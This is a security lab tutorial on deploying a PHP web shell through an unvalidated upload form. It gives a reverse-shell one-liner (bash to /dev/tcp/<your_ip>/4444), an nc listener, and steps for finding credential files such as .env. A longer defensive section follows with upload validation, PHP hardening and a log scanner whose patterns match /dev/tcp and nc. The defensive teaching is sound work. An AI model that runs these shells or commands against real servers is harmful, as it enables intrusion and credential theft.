Objective: Learn to exploit a web shell for privilege escalation on a compromised web server, and understand how to secure web servers against such attacks.
Scenario: Web shells are malicious scripts uploaded to a web server to allow attackers to execute arbitrary commands. Once a web shell is deployed, attackers can use it to interact with the server’s file system, extract sensitive information, and escalate privileges. Your task is to deploy and exploit a web shell while implementing measures to secure the server.
Lab Setup
- Environment:
  - A web server vulnerable to file upload attacks.
- Tools Required:
  - A web shell script (e.g., PHP-based shell).
  - Terminal access for interacting with the web shell.
Lab Steps
Step 1: Deploy a Web Shell
- Identify a file upload vulnerability in the web application.
  - Example: An upload form that doesn’t validate file types.
- Create a simple PHP web shell:

  ```php
  <?php if(isset($_REQUEST['cmd'])) { echo '<pre>'; echo '</pre>'; } ?>
  ```

- Save the file as `shell.php`.
- Upload the web shell to the server using the vulnerable upload form.
- Access the uploaded web shell in your browser:

  ```
  http://<target_ip>/uploads/shell.php
  ```
Step 2: Interact with the Web Shell
- Use the web shell to execute system commands:

  ```
  http://<target_ip>/uploads/shell.php?cmd=ls
  ```

- Replace `ls` with other commands to explore the server.
- Identify sensitive files, such as:
  - Configuration files (e.g., `wp-config.php`, `.env`).
  - User credentials or database connections.
Step 3: Escalate Privileges
- Search for privilege escalation vectors:
  - Writable cron jobs.
  - Misconfigured file permissions.
  - SUID binaries.
- Deploy a reverse shell payload through the web shell:

  ```
  http://<target_ip>/uploads/shell.php?cmd=bash -i >& /dev/tcp/<your_ip>/4444 0>&1
  ```

- Replace `<your_ip>` and `4444` with your listener’s IP and port.
- Set up a listener on your machine:

  ```bash
  nc -lvnp 4444
  ```

- Verify the reverse shell connection and check your privileges:

  ```bash
  whoami
  ```
Solution
Explanation:
- A web shell provides attackers with remote access to a server’s command line.
- By escalating privileges, attackers can gain root access and compromise the entire server.
Prevention:
- Validate File Uploads:
  - Restrict allowed file types using MIME type validation.
  - Example configuration in PHP:

    ```php
    $allowed = ['image/jpeg', 'image/png'];
    // Note: $_FILES['file']['type'] is the Content-Type sent by the client and can be
    // forged; confirm the type server-side (e.g. with finfo) before relying on this check.
    if (!in_array($_FILES['file']['type'], $allowed, true)) {
        die('Invalid file type.');
    }
    ```

- Disable Dangerous PHP Functions:
  - Disable functions like `system`, `exec`, and `shell_exec` in `php.ini`:

    ```ini
    disable_functions = system,exec,shell_exec,passthru
    ```

- Restrict Directory Permissions:
  - Ensure upload directories cannot execute scripts (this removes world access; whether PHP files are executed is decided by the web server's handler configuration, which the `.htaccess` rule below addresses):

    ```bash
    chmod -R 750 /var/www/uploads
    ```

  - Add a `.htaccess` file to deny script execution:

    ```apache
    <FilesMatch ".*\.(php|pl|py|jsp)$">
        # Apache 2.2 syntax; on Apache 2.4 use "Require all denied"
        deny from all
    </FilesMatch>
    ```

- Monitor and Log Activity:
  - Use web server logs to detect unusual activity:

    ```bash
    sudo tail -f /var/log/apache2/access.log
    ```

- Deploy a Web Application Firewall (WAF):
  - Use tools like ModSecurity to filter malicious requests.
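As an added example (not code from the original lab), the following PHP upload handler applies the prevention points above together: an extension allowlist, server-side MIME detection with `finfo` instead of the client-supplied `$_FILES[...]['type']`, a size limit, a random stored filename, and non-executable permissions. The upload directory, the size limit, and the `validate_upload` / `store_upload` function names are assumptions; the CLI demo at the bottom runs the checks on constructed temp files rather than a real request.

```php
<?php
// Added example (not part of the original lab): a hardened upload handler that
// validates the file's content on the server instead of trusting the client's
// Content-Type. The upload directory, size limit and helper names are assumptions.
declare(strict_types=1);

// Allowed extensions mapped to the MIME type finfo must detect for them.
const ALLOWED = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png'];
const MAX_BYTES = 2 * 1024 * 1024; // assumed limit

/**
 * Validate one $_FILES entry. Returns [true, safeFilename] or [false, reason].
 * $isUploaded defaults to is_uploaded_file(); the CLI demo passes is_file()
 * so the same checks can run on ordinary temp files.
 */
function validate_upload(array $file, ?callable $isUploaded = null): array
{
    $isUploaded ??= 'is_uploaded_file';
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return [false, 'upload error'];
    }
    if (!$isUploaded($file['tmp_name'])) {
        return [false, 'not an uploaded file'];
    }
    if (filesize($file['tmp_name']) > MAX_BYTES) {
        return [false, 'file too large'];
    }
    // Only the final extension of the client-supplied name is considered, and it
    // must be allowlisted: shell.php is rejected here; a .png name hiding PHP code
    // is rejected by the content check below.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        return [false, "extension '.$ext' not allowed"];
    }
    // Server-side detection reads the file bytes; $_FILES[...]['type'] is ignored.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($detected !== ALLOWED[$ext]) {
        return [false, "content detected as '$detected', expected " . ALLOWED[$ext]];
    }
    // Never keep the client's name: random name, allowlisted extension only.
    return [true, bin2hex(random_bytes(16)) . '.' . $ext];
}

/** Store a validated upload in $uploadDir (outside the web root, or a non-executing directory). */
function store_upload(array $file, string $uploadDir): string
{
    [$ok, $result] = validate_upload($file);
    if (!$ok) {
        throw new RuntimeException("Rejected upload: $result");
    }
    $dest = rtrim($uploadDir, '/') . '/' . $result;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0640); // readable by the server, never executable
    return $dest;
}

// CLI demo with constructed inputs (no real HTTP request involved).
if (PHP_SAPI === 'cli') {
    $png = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($png, "\x89PNG\r\n\x1a\n" . str_repeat("\0", 64)); // PNG signature
    $php = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($php, "<?php echo 'x'; ?>");                        // PHP source
    $cases = [
        // name, temp file, client-claimed type
        ['photo.png', $png, 'image/png'],
        ['shell.php', $php, 'image/png'], // forged Content-Type, disallowed extension
        ['shell.png', $php, 'image/png'], // forged Content-Type, PHP bytes behind a .png name
    ];
    foreach ($cases as [$name, $tmp, $type]) {
        $file = ['name' => $name, 'tmp_name' => $tmp, 'type' => $type, 'error' => UPLOAD_ERR_OK];
        [$ok, $msg] = validate_upload($file, 'is_file');
        printf("%-10s -> %s (%s)\n", $name, $ok ? 'ACCEPT' : 'REJECT', $msg);
    }
    unlink($png);
    unlink($php);
}
```

Run it with `php upload_check.php`: the PNG is accepted and both forged cases are rejected, the first on extension and the second because `finfo` reports `text/x-php` rather than `image/png`. In a real handler call `store_upload($_FILES['file'], $uploadDir)` and keep the `.htaccess` rule from the prevention list on the directory as a second layer.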
Testing and Verification
- Test file upload forms to ensure only allowed file types are accepted.
- Attempt to execute scripts in the upload directory to confirm they are blocked.
- Monitor logs for evidence of malicious activity.
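To make the log-monitoring step concrete, the following PHP script (an added example, not part of the original lab) parses Apache combined-format access log lines and flags the web-shell indicators from this exercise: a script requested from the upload directory, a command-style query parameter such as `cmd`, and shell syntax like `/dev/tcp/` in the query string. The sample log lines are constructed, the upload path and parameter names are assumptions to tune for a real server, and PHP 8 is assumed for `str_starts_with`.

```php
<?php
// Added example (not part of the original lab): scan Apache combined-format
// access log lines for web-shell indicators. Sample lines are constructed;
// UPLOAD_PATH and CMD_PARAMS are assumptions to tune per deployment.
declare(strict_types=1);

const UPLOAD_PATH = '/uploads/';
// Parameter names commonly used to pass commands to web shells (this lab uses cmd).
const CMD_PARAMS = ['cmd', 'c', 'exec', 'command'];

/** Parse one combined-log line into fields, or null if it does not match. */
function parse_access_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'url' => $m[4], 'status' => (int)$m[5]];
}

/** Return the reasons a request looks like web-shell activity (empty array = clean). */
function webshell_indicators(array $req): array
{
    $reasons = [];
    $path  = parse_url($req['url'], PHP_URL_PATH) ?? '';
    $query = parse_url($req['url'], PHP_URL_QUERY) ?? '';
    parse_str($query, $params);

    // A server-side script served from the upload directory should never happen.
    $scriptExt = (bool)preg_match('/\.(php\d?|phtml|phar|pl|py|jsp)$/i', $path);
    if ($scriptExt && str_starts_with($path, UPLOAD_PATH)) {
        $reasons[] = 'script requested inside upload directory';
    }
    foreach (CMD_PARAMS as $p) {
        if (isset($params[$p])) {
            $reasons[] = "command-style parameter '$p'";
            break;
        }
    }
    // Shell metacharacters or /dev/tcp in the decoded query string (reverse-shell pattern from the lab).
    if ($query !== '' && preg_match('#(/dev/tcp/|\|\s*(nc|bash|sh)\b|;\s*(id|whoami)\b)#i', urldecode($query))) {
        $reasons[] = 'shell syntax in query string';
    }
    return $reasons;
}

/** Scan a list of log lines and return the suspicious requests with their reasons. */
function scan_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        $req = parse_access_line($line);
        if ($req === null) {
            continue;
        }
        $why = webshell_indicators($req);
        if ($why !== []) {
            $hits[] = ['ip' => $req['ip'], 'time' => $req['time'], 'url' => $req['url'], 'reasons' => $why];
        }
    }
    return $hits;
}

// Constructed sample lines (not real traffic); 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
$sample = [
    '203.0.113.5 - - [10/Oct/2024:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 1043',
    '203.0.113.5 - - [10/Oct/2024:13:55:40 +0000] "POST /upload.php HTTP/1.1" 302 0',
    '203.0.113.5 - - [10/Oct/2024:13:55:42 +0000] "GET /uploads/shell.php?cmd=ls HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2024:13:56:01 +0000] "GET /uploads/shell.php?cmd=bash%20-i%20%3E%26%20/dev/tcp/198.51.100.9/4444%200%3E%261 HTTP/1.1" 200 0',
    '198.51.100.20 - - [10/Oct/2024:13:57:00 +0000] "GET /uploads/photo.png HTTP/1.1" 200 20480',
];

foreach (scan_log($sample) as $hit) {
    echo $hit['ip'], ' [', $hit['time'], '] ', $hit['url'], "\n    ", implode('; ', $hit['reasons']), "\n";
}
```

Only the two `shell.php` requests are reported (the second with all three reasons); the image download and the upload POST are not. To run it against a live server, replace `$sample` with `file('/var/log/apache2/access.log', FILE_IGNORE_NEW_LINES)` or pipe `tail -f` output through a loop over `STDIN`. Treat a hit on the first reason as the strongest signal: a request for a `.php` file under the upload path is evidence the upload filter was bypassed regardless of the query string.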
Reflection
This exercise demonstrates how web shells can be used to compromise a server and escalate privileges. By implementing strong validation, disabling dangerous functions, and monitoring server activity, you can effectively secure web servers against such attacks.